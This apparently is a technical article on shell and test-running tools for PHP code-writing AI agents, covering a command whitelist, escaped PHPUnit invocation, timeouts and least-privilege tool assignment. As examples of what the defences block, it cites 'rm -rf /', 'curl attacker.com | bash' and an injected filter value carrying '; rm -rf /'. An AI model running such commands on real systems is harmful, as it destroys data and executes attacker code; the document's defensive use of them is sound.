BashTool and RunTestsTool: Self-Check Loops for Code-Writing Agents

Why only VajbCoder and TestAgent get shell access — BashTool's allowed command whitelist (php -l, phpunit, phpstan), RunTestsTool for targeted PHPUnit execution, and the write-lint-test-fix self-check loop that catches errors before human review.

Code-writing agents have a unique problem: how do you know the code you just wrote actually works? You can't just generate code and hope — the AI needs to check its own output. BashTool and RunTestsTool make this possible.


BashTool: Whitelisted Shell Access

BashTool allows command execution, but only specific commands:

private const ALLOWED_COMMANDS = [
    'php -l',           // Syntax check
    'php -r',           // Quick PHP execution
    'phpunit',          // Test execution
    'phpstan',          // Static analysis
    'composer',         // Dependency info (not install)
    'git diff',         // See changes
    'git status',       // Check state
    'git log',          // History
];

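Every command is checked against this whitelist before execution. An agent can't run rm -rf / or curl attacker.com | bash directly; it can only lint, test, analyze, and inspect. Two entries are broader than their comments suggest, though: php -r executes arbitrary PHP, and if the check is a plain prefix match, the bare composer entry also matches composer install unless subcommands are filtered separately.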
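One way such a check could look, as a minimal sketch. The article shows only the constant, so the function name isCommandAllowed, the prefix-matching rule, and the shell-metacharacter filter are all assumptions rather than BashTool's actual code. It needs PHP 8 for str_starts_with().

```php
<?php
declare(strict_types=1);

// Same entries as the article's ALLOWED_COMMANDS constant.
const ALLOWED_COMMANDS = [
    'php -l', 'php -r', 'phpunit', 'phpstan',
    'composer', 'git diff', 'git status', 'git log',
];

// Hypothetical helper: returns true only for commands that start with a whitelisted prefix.
function isCommandAllowed(string $command): bool
{
    $command = trim($command);

    // Assumption: reject shell operators so an allowed prefix cannot
    // smuggle in a second command (e.g. "git status; rm -rf /").
    if (preg_match('/[;&|`$<>\n]/', $command) === 1) {
        return false;
    }

    foreach (ALLOWED_COMMANDS as $allowed) {
        // Require an exact match or the prefix followed by a space,
        // so "phpunit" does not also allow "phpunit-evil".
        if ($command === $allowed || str_starts_with($command, $allowed . ' ')) {
            return true;
        }
    }

    return false;
}
```

The metacharacter filter here is deliberately strict: it would also reject most useful php -r snippets, since those usually contain ; or $. A real implementation has to decide how much of that flexibility it is willing to give up.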

Who Gets BashTool

Only VajbCoder and TestAgent. Not ReviewAgent (read-only). Not DocAgent (no need to run commands). Not KIK (orchestrator, not executor).

The reasoning: VajbCoder writes code and needs to verify that it parses and passes its checks. TestAgent writes tests and needs to run them. Other agents don't generate executable artifacts.


The Write-Lint-Test-Fix Loop

VajbCoder's typical iteration pattern:

Iteration 1: Read existing code → understand structure
Iteration 2: Write new code via write_file
Iteration 3: php -l newfile.php → syntax check
             If error: read error, fix code, go back to iteration 2
Iteration 4: phpunit --filter NewFeatureTest → run tests
             If fail: read failure, fix code, go back to iteration 2
Iteration 5: phpstan analyze newfile.php → static analysis
             If errors: fix type hints, go back to iteration 2
Iteration 6: generate_patch (or confirm done) → auto-exit

The self-check loop catches three categories of errors:

  1. Syntax errors: php -l catches missing semicolons, unmatched braces

  2. Logic errors: phpunit catches wrong behavior, broken assertions

  3. Type errors: phpstan catches missing type hints, null safety issues


Without this loop, the agent would generate code in one shot and hand it off. With the loop, the agent iterates until the code passes all checks — or runs out of iterations.
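The control flow of that loop can be sketched in a few lines. This is a simplification under stated assumptions: in the real system the model decides each step, whereas here a hypothetical selfCheckLoop() function runs a fixed list of checks and calls a hypothetical $fix callback on the first failure. The names and the array shape of a check result are illustrative, not taken from the article's codebase.

```php
<?php
declare(strict_types=1);

/**
 * Hypothetical driver for a write-lint-test-fix loop.
 *
 * @param array<string, callable> $checks  name => callable returning ['ok' => bool, 'output' => string]
 * @param callable                $fix     called as $fix($checkName, $output) after a failure
 * @return bool true if every check passed within the iteration budget
 */
function selfCheckLoop(array $checks, callable $fix, int $maxIterations): bool
{
    for ($i = 0; $i < $maxIterations; $i++) {
        $failed = false;

        foreach ($checks as $name => $check) {
            $result = $check();
            if (!$result['ok']) {
                // Hand the failure output to the fixer, then start over
                // from the first check, since a fix may break earlier ones.
                $fix($name, $result['output']);
                $failed = true;
                break;
            }
        }

        if (!$failed) {
            return true; // all checks passed
        }
    }

    return false; // ran out of iterations
}
```

Restarting from the first check after every fix mirrors the "go back and rewrite" step in the iteration list: a change made to satisfy phpstan can reintroduce a syntax or test failure.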


RunTestsTool

A specialized tool for TestAgent:

public function execute(array $params): array
{
    $testFile = $params['file'] ?? null;     // Specific test file
    $filter = $params['filter'] ?? null;     // --filter pattern
    $suite = $params['suite'] ?? null;       // --testsuite name

    // Build the command, escaping every caller-supplied value
    $command = 'php vendor/bin/phpunit';
    if ($testFile !== null) {
        $command .= ' ' . escapeshellarg($testFile);
    }
    if ($filter !== null) {
        $command .= ' --filter ' . escapeshellarg($filter);
    }
    if ($suite !== null) {
        $command .= ' --testsuite ' . escapeshellarg($suite);
    }

    // Execute with timeout
    $output = $this->executeWithTimeout($command, 120);

    return ['success' => $this->parseSuccess($output), 'content' => $output];
}

Parameters are escaped with escapeshellarg() — no command injection through test file names or filter patterns.
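To see what the escaping does, here is a standalone version of the command-building step. The function name buildPhpunitCommand is hypothetical; the escapeshellarg() calls are the same as in the method above.

```php
<?php
declare(strict_types=1);

// Hypothetical standalone version of the command-building step.
function buildPhpunitCommand(?string $file, ?string $filter): string
{
    $command = 'php vendor/bin/phpunit';
    if ($file !== null) {
        $command .= ' ' . escapeshellarg($file);
    }
    if ($filter !== null) {
        $command .= ' --filter ' . escapeshellarg($filter);
    }

    return $command;
}

// A filter that tries to append a second command stays inside one quoted argument.
// On Linux/macOS this prints: php vendor/bin/phpunit --filter 'NewTest; rm -rf /'
echo buildPhpunitCommand(null, 'NewTest; rm -rf /'), PHP_EOL;
```

The shell sees the whole filter as a single argument to phpunit, so the ; never acts as a command separator. On Windows, escapeshellarg() quotes differently, so the exact output varies by platform.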

TestAgent's Loop

Iteration 1: Read source code to understand what to test
Iteration 2: Read existing tests for patterns
Iteration 3: Write test file via write_file (tests/ only)
Iteration 4: run_tests(file: 'tests/Unit/NewTest.php')
             If fail: read output, fix test, rewrite
Iteration 5: run_tests(filter: 'NewTest') → confirm pass

TestAgent's WriteFileTool is restricted to tests/ — it can't accidentally modify production code while fixing a test failure.
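The article does not show how that restriction is enforced. A minimal sketch of one possible guard follows, assuming paths are given relative to the project root; the function name isInsideTestsDir is hypothetical. It normalizes . and .. segments by hand because realpath() only works for files that already exist, and a test file being written may not.

```php
<?php
declare(strict_types=1);

// Hypothetical guard: true only if the normalized path lies under tests/.
function isInsideTestsDir(string $relativePath): bool
{
    // Reject empty paths, absolute paths, and embedded NUL bytes outright.
    if ($relativePath === '' || $relativePath[0] === '/' || str_contains($relativePath, "\0")) {
        return false;
    }

    $parts = [];
    foreach (explode('/', str_replace('\\', '/', $relativePath)) as $segment) {
        if ($segment === '' || $segment === '.') {
            continue; // no-op segments
        }
        if ($segment === '..') {
            if ($parts === []) {
                return false; // would climb above the project root
            }
            array_pop($parts);
            continue;
        }
        $parts[] = $segment;
    }

    // Must be a file somewhere below tests/, not the directory itself.
    return count($parts) >= 2 && $parts[0] === 'tests';
}
```

This catches traversal such as tests/../src/Service.php, but it does not resolve symlinks; a stricter version would also check the real path of the parent directory.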


Command Timeout

Both tools enforce execution timeouts:

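private function executeWithTimeout(string $command, int $timeoutSeconds): string
{
    // $descriptors (the pipe specification) is set up in code not shown here
    $process = proc_open($command, $descriptors, $pipes);
    // ... read output with timeout, tracking $elapsedSeconds ...
    if ($elapsedSeconds > $timeoutSeconds) {
        proc_terminate($process);
        return "Command timed out after {$timeoutSeconds}s";
    }
    // ... otherwise return the collected output ...
}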

Default timeout: 120 seconds. Long enough for a full PHPUnit suite, short enough to stop a hung command (an infinite loop in generated code, for example) from stalling the agent.
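For readers who want to see the elided part, here is one way the read-with-timeout step could be filled in. It is a sketch, not the article's implementation: it is written as a standalone function named runWithTimeout (hypothetical), polls a non-blocking pipe, and merges stderr into stdout with the 'redirect' descriptor, which requires PHP 7.4 or later.

```php
<?php
declare(strict_types=1);

// Sketch: run a shell command and give up after $timeoutSeconds.
function runWithTimeout(string $command, int $timeoutSeconds): string
{
    $descriptors = [
        0 => ['pipe', 'r'],      // stdin (closed immediately below)
        1 => ['pipe', 'w'],      // stdout, read by this process
        2 => ['redirect', 1],    // stderr merged into stdout (PHP 7.4+)
    ];

    $process = proc_open($command, $descriptors, $pipes);
    if (!is_resource($process)) {
        return 'Failed to start command';
    }

    fclose($pipes[0]);
    stream_set_blocking($pipes[1], false); // so reads never hang past the deadline

    $output = '';
    $start = microtime(true);

    while (true) {
        $chunk = stream_get_contents($pipes[1]);
        if ($chunk !== false) {
            $output .= $chunk;
        }

        if (!proc_get_status($process)['running']) {
            // Process finished: drain whatever is still buffered in the pipe.
            stream_set_blocking($pipes[1], true);
            $rest = stream_get_contents($pipes[1]);
            if ($rest !== false) {
                $output .= $rest;
            }
            break;
        }

        if (microtime(true) - $start > $timeoutSeconds) {
            proc_terminate($process);
            fclose($pipes[1]);
            proc_close($process);
            return "Command timed out after {$timeoutSeconds}s";
        }

        usleep(20000); // poll every 20 ms instead of busy-waiting
    }

    fclose($pipes[1]);
    proc_close($process);

    return $output;
}
```

One caveat with this approach: when the command is a string, proc_open() runs it through a shell, and proc_terminate() signals that shell. Depending on the shell, a child process it spawned may keep running after the timeout, so a production version may need process groups or the array form of the command.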


Why Not Give Every Agent BashTool

Shell access is the most powerful tool. An agent with BashTool can:

  • Read any file (via php -r; cat itself is not on the whitelist)

  • List directories (via php -r; ls is not on the whitelist either)

  • Check git history (via git log)

  • Run arbitrary PHP (via php -r)


Even with a whitelist, it's more capability than most agents need. ReviewAgent only needs to read — giving it BashTool would be capability bloat that increases attack surface without benefit.

The principle: every agent gets the minimum tools for its job. VajbCoder needs to lint and test its output → BashTool. ReviewAgent needs to read code → ReadFileTool. KIK needs to delegate → DelegateAgentTool.
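The principle can be expressed as a small lookup table. This is an illustration only: the tool names come from this article, but the AGENT_TOOLS structure and the agentMayUse() helper are assumptions, and the lists include only tools the article mentions, so they are likely incomplete.

```php
<?php
declare(strict_types=1);

// Illustrative registry: which tools each agent is allowed to call.
// Only tools named in the article are listed; real lists may be longer.
const AGENT_TOOLS = [
    'VajbCoder'   => ['WriteFileTool', 'BashTool'],
    'TestAgent'   => ['WriteFileTool', 'RunTestsTool', 'BashTool'],
    'ReviewAgent' => ['ReadFileTool'],
    'KIK'         => ['DelegateAgentTool'],
];

// Hypothetical helper: unknown agents get no tools at all (deny by default).
function agentMayUse(string $agent, string $tool): bool
{
    return in_array($tool, AGENT_TOOLS[$agent] ?? [], true);
}
```

Denying by default means a newly added agent starts with no capabilities until someone explicitly grants them, which keeps the attack surface from growing by accident.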


Up Next

Next up: ManageScheduleTool and SharedContextTool: Scheduling and Cross-Run Memory — how KIK manages scheduled agent runs via natural language, and how agents persist knowledge across executions.
